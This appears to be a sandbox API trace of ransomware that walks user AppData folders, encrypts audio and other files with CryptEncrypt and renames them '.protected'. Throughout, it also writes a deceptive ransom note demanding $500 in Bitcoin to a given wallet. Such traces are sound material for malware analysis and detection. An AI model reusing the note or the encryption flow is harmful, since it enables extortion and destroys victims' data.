lpOverlapped=0x0) returned 1 [0089.427] lstrlenA (lpString="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") returned 684 [0089.427] WriteFile (in: hFile=0xd4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ec94*=0x2ac, lpOverlapped=0x0) returned 1 [0089.427] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0089.427] WriteFile (in: hFile=0xd4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ec94*=0xb1, 
lpOverlapped=0x0) returned 1 [0089.428] CloseHandle (hObject=0xd4) returned 1 [0089.428] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0 [0089.428] FindClose (in: hFindFile=0x47b9d0 | out: hFindFile=0x47b9d0) returned 1 [0089.428] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\RESTORE_FILES.txt") returned 68 [0089.428] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0089.428] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0089.428] WriteFile (in: hFile=0xb4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ef04*=0x53d, lpOverlapped=0x0) returned 1 [0089.429] lstrlenA (lpString="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") returned 684 [0089.429] WriteFile (in: hFile=0xb4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ef04*=0x2ac, lpOverlapped=0x0) returned 1 [0089.429] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0089.429] WriteFile (in: hFile=0xb4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ef04*=0xb1, 
lpOverlapped=0x0) returned 1 [0089.429] CloseHandle (hObject=0xb4) returned 1 [0089.429] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0089.429] lstrcmpiW (lpString1="Roaming", lpString2="Windows") returned -1 [0089.429] lstrcmpiW (lpString1="Roaming", lpString2="Program Files") returned 1 [0089.429] lstrcmpiW (lpString1="Roaming", lpString2="Program Files (x86)") returned 1 [0089.429] lstrcmpiW (lpString1="Roaming", lpString2="$Recycle.bin") returned 1 [0089.429] lstrcmpiW (lpString1="Roaming", lpString2="System Volume Information") returned -1 [0089.429] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned 49 [0089.429] lstrcmpW (lpString1="Roaming", lpString2=".") returned 1 [0089.429] lstrcmpW (lpString1="Roaming", lpString2="..") returned 1 [0089.429] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\*") returned 51 [0089.429] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\*", lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0x47b9d0 [0089.429] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0089.429] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0089.429] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0089.429] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0089.429] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0089.429] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\.") returned 51 [0089.429] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0089.429] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 
[0089.429] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0089.429] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0089.429] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0089.430] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0089.430] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0089.430] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\..") returned 52 [0089.430] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0089.430] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0089.430] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0089.430] lstrcmpiW (lpString1="-1J7-8YxglaQnfl.mp3", lpString2="Windows") returned -1 [0089.430] lstrcmpiW (lpString1="-1J7-8YxglaQnfl.mp3", lpString2="Program Files") returned -1 [0089.430] lstrcmpiW (lpString1="-1J7-8YxglaQnfl.mp3", lpString2="Program Files (x86)") returned -1 [0089.430] lstrcmpiW (lpString1="-1J7-8YxglaQnfl.mp3", lpString2="$Recycle.bin") returned 1 [0089.430] lstrcmpiW (lpString1="-1J7-8YxglaQnfl.mp3", lpString2="System Volume Information") returned -1 [0089.430] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\-1J7-8YxglaQnfl.mp3") returned 69 [0089.430] StrStrIW (lpFirst="-1J7-8YxglaQnfl.mp3", lpSrch=".protected") returned 0x0 [0089.430] lstrcmpW (lpString1="-1J7-8YxglaQnfl.mp3", lpString2="RESTORE_FILES.txt") returned -1 [0089.430] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0089.430] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x30) returned 1 [0089.430] CreateFileW 
(lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\-1J7-8YxglaQnfl.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\-1j7-8yxglaqnfl.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0089.430] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\-1J7-8YxglaQnfl.mp3") returned 69 [0089.430] StrStrW (lpFirst="-1J7-8YxglaQnfl.mp3", lpSrch=".txt") returned 0x0 [0089.430] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\-1J7-8YxglaQnfl.mp3") returned 69 [0089.430] StrStrW (lpFirst="-1J7-8YxglaQnfl.mp3", lpSrch=".rar") returned 0x0 [0089.430] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\-1J7-8YxglaQnfl.mp3") returned 69 [0089.430] StrStrW (lpFirst="-1J7-8YxglaQnfl.mp3", lpSrch=".zip") returned 0x0 [0089.430] ReadFile (in: hFile=0xd4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0089.431] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.431] WriteFile (in: hFile=0xd4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0089.432] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.432] WriteFile (in: hFile=0xd4, lpBuffer=0x295eedc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x295eedc*, lpNumberOfBytesWritten=0x295ef04*=0x4, lpOverlapped=0x0) returned 1 [0089.432] WriteFile (in: hFile=0xd4, 
lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ef04*=0x30, lpOverlapped=0x0) returned 1 [0089.432] CloseHandle (hObject=0xd4) returned 1 [0089.435] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\-1J7-8YxglaQnfl.mp3.protected") returned 79 [0089.435] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\-1J7-8YxglaQnfl.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\-1j7-8yxglaqnfl.mp3"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\-1J7-8YxglaQnfl.mp3.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\-1j7-8yxglaqnfl.mp3.protected")) returned 1 [0089.436] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0089.436] lstrcmpiW (lpString1="-9w4hFHRm0DMK4.wav", lpString2="Windows") returned -1 [0089.436] lstrcmpiW (lpString1="-9w4hFHRm0DMK4.wav", lpString2="Program Files") returned -1 [0089.436] lstrcmpiW (lpString1="-9w4hFHRm0DMK4.wav", lpString2="Program Files (x86)") returned -1 [0089.436] lstrcmpiW (lpString1="-9w4hFHRm0DMK4.wav", lpString2="$Recycle.bin") returned 1 [0089.436] lstrcmpiW (lpString1="-9w4hFHRm0DMK4.wav", lpString2="System Volume Information") returned -1 [0089.436] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\-9w4hFHRm0DMK4.wav") returned 68 [0089.436] StrStrIW (lpFirst="-9w4hFHRm0DMK4.wav", lpSrch=".protected") returned 0x0 [0089.436] lstrcmpW (lpString1="-9w4hFHRm0DMK4.wav", lpString2="RESTORE_FILES.txt") returned -1 [0089.436] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0089.436] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, 
dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x30) returned 1 [0089.436] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\-9w4hFHRm0DMK4.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\-9w4hfhrm0dmk4.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0089.436] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\-9w4hFHRm0DMK4.wav") returned 68 [0089.436] StrStrW (lpFirst="-9w4hFHRm0DMK4.wav", lpSrch=".txt") returned 0x0 [0089.436] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\-9w4hFHRm0DMK4.wav") returned 68 [0089.436] StrStrW (lpFirst="-9w4hFHRm0DMK4.wav", lpSrch=".rar") returned 0x0 [0089.436] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\-9w4hFHRm0DMK4.wav") returned 68 [0089.436] StrStrW (lpFirst="-9w4hFHRm0DMK4.wav", lpSrch=".zip") returned 0x0 [0089.436] ReadFile (in: hFile=0xd4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ef04*=0xa35, lpOverlapped=0x0) returned 1 [0089.437] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0xfffff5cb, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.437] WriteFile (in: hFile=0xd4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0xa35, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ef04*=0xa35, lpOverlapped=0x0) returned 1 [0089.438] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.438] WriteFile (in: hFile=0xd4, lpBuffer=0x295eedc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ef04, 
lpOverlapped=0x0 | out: lpBuffer=0x295eedc*, lpNumberOfBytesWritten=0x295ef04*=0x4, lpOverlapped=0x0) returned 1 [0089.438] WriteFile (in: hFile=0xd4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ef04*=0x30, lpOverlapped=0x0) returned 1 [0089.438] CloseHandle (hObject=0xd4) returned 1 [0089.439] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\-9w4hFHRm0DMK4.wav.protected") returned 78 [0089.439] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\-9w4hFHRm0DMK4.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\-9w4hfhrm0dmk4.wav"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\-9w4hFHRm0DMK4.wav.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\-9w4hfhrm0dmk4.wav.protected")) returned 1 [0089.440] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0089.440] lstrcmpiW (lpString1="0ejC8uOVaEm_.mp3", lpString2="Windows") returned -1 [0089.440] lstrcmpiW (lpString1="0ejC8uOVaEm_.mp3", lpString2="Program Files") returned -1 [0089.440] lstrcmpiW (lpString1="0ejC8uOVaEm_.mp3", lpString2="Program Files (x86)") returned -1 [0089.440] lstrcmpiW (lpString1="0ejC8uOVaEm_.mp3", lpString2="$Recycle.bin") returned 1 [0089.440] lstrcmpiW (lpString1="0ejC8uOVaEm_.mp3", lpString2="System Volume Information") returned -1 [0089.440] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\0ejC8uOVaEm_.mp3") returned 66 [0089.440] StrStrIW (lpFirst="0ejC8uOVaEm_.mp3", lpSrch=".protected") returned 0x0 [0089.440] lstrcmpW (lpString1="0ejC8uOVaEm_.mp3", lpString2="RESTORE_FILES.txt") returned -1 [0089.440] CryptGenRandom (in: hProv=0x444d38, 
dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0089.440] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x30) returned 1 [0089.440] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\0ejC8uOVaEm_.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\0ejc8uovaem_.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0089.440] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\0ejC8uOVaEm_.mp3") returned 66 [0089.440] StrStrW (lpFirst="0ejC8uOVaEm_.mp3", lpSrch=".txt") returned 0x0 [0089.440] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\0ejC8uOVaEm_.mp3") returned 66 [0089.440] StrStrW (lpFirst="0ejC8uOVaEm_.mp3", lpSrch=".rar") returned 0x0 [0089.440] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\0ejC8uOVaEm_.mp3") returned 66 [0089.440] StrStrW (lpFirst="0ejC8uOVaEm_.mp3", lpSrch=".zip") returned 0x0 [0089.440] ReadFile (in: hFile=0xd4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0089.441] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.441] WriteFile (in: hFile=0xd4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0089.442] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 
[0089.442] WriteFile (in: hFile=0xd4, lpBuffer=0x295eedc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x295eedc*, lpNumberOfBytesWritten=0x295ef04*=0x4, lpOverlapped=0x0) returned 1 [0089.442] WriteFile (in: hFile=0xd4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ef04*=0x30, lpOverlapped=0x0) returned 1 [0089.442] CloseHandle (hObject=0xd4) returned 1 [0089.442] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\0ejC8uOVaEm_.mp3.protected") returned 76 [0089.442] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\0ejC8uOVaEm_.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\0ejc8uovaem_.mp3"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\0ejC8uOVaEm_.mp3.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\0ejc8uovaem_.mp3.protected")) returned 1 [0089.443] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0089.443] lstrcmpiW (lpString1="1lBEed2dKI61.mp3", lpString2="Windows") returned -1 [0089.443] lstrcmpiW (lpString1="1lBEed2dKI61.mp3", lpString2="Program Files") returned -1 [0089.443] lstrcmpiW (lpString1="1lBEed2dKI61.mp3", lpString2="Program Files (x86)") returned -1 [0089.443] lstrcmpiW (lpString1="1lBEed2dKI61.mp3", lpString2="$Recycle.bin") returned 1 [0089.443] lstrcmpiW (lpString1="1lBEed2dKI61.mp3", lpString2="System Volume Information") returned -1 [0089.443] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\1lBEed2dKI61.mp3") returned 66 [0089.443] StrStrIW (lpFirst="1lBEed2dKI61.mp3", lpSrch=".protected") returned 0x0 [0089.443] lstrcmpW 
(lpString1="1lBEed2dKI61.mp3", lpString2="RESTORE_FILES.txt") returned -1 [0089.443] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0089.443] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x30) returned 1 [0089.443] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\1lBEed2dKI61.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\1lbeed2dki61.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0089.444] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\1lBEed2dKI61.mp3") returned 66 [0089.444] StrStrW (lpFirst="1lBEed2dKI61.mp3", lpSrch=".txt") returned 0x0 [0089.444] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\1lBEed2dKI61.mp3") returned 66 [0089.444] StrStrW (lpFirst="1lBEed2dKI61.mp3", lpSrch=".rar") returned 0x0 [0089.444] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\1lBEed2dKI61.mp3") returned 66 [0089.444] StrStrW (lpFirst="1lBEed2dKI61.mp3", lpSrch=".zip") returned 0x0 [0089.444] ReadFile (in: hFile=0xd4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0089.444] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.444] WriteFile (in: hFile=0xd4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0089.445] SetFilePointerEx (in: 
hFile=0xd4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.445] WriteFile (in: hFile=0xd4, lpBuffer=0x295eedc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x295eedc*, lpNumberOfBytesWritten=0x295ef04*=0x4, lpOverlapped=0x0) returned 1 [0089.445] WriteFile (in: hFile=0xd4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ef04*=0x30, lpOverlapped=0x0) returned 1 [0089.445] CloseHandle (hObject=0xd4) returned 1 [0089.446] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\1lBEed2dKI61.mp3.protected") returned 76 [0089.446] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\1lBEed2dKI61.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\1lbeed2dki61.mp3"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\1lBEed2dKI61.mp3.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\1lbeed2dki61.mp3.protected")) returned 1 [0089.446] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0089.446] lstrcmpiW (lpString1="Adobe", lpString2="Windows") returned -1 [0089.446] lstrcmpiW (lpString1="Adobe", lpString2="Program Files") returned -1 [0089.446] lstrcmpiW (lpString1="Adobe", lpString2="Program Files (x86)") returned -1 [0089.446] lstrcmpiW (lpString1="Adobe", lpString2="$Recycle.bin") returned 1 [0089.446] lstrcmpiW (lpString1="Adobe", lpString2="System Volume Information") returned -1 [0089.446] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe") returned 55 [0089.446] lstrcmpW (lpString1="Adobe", lpString2=".") returned 1 
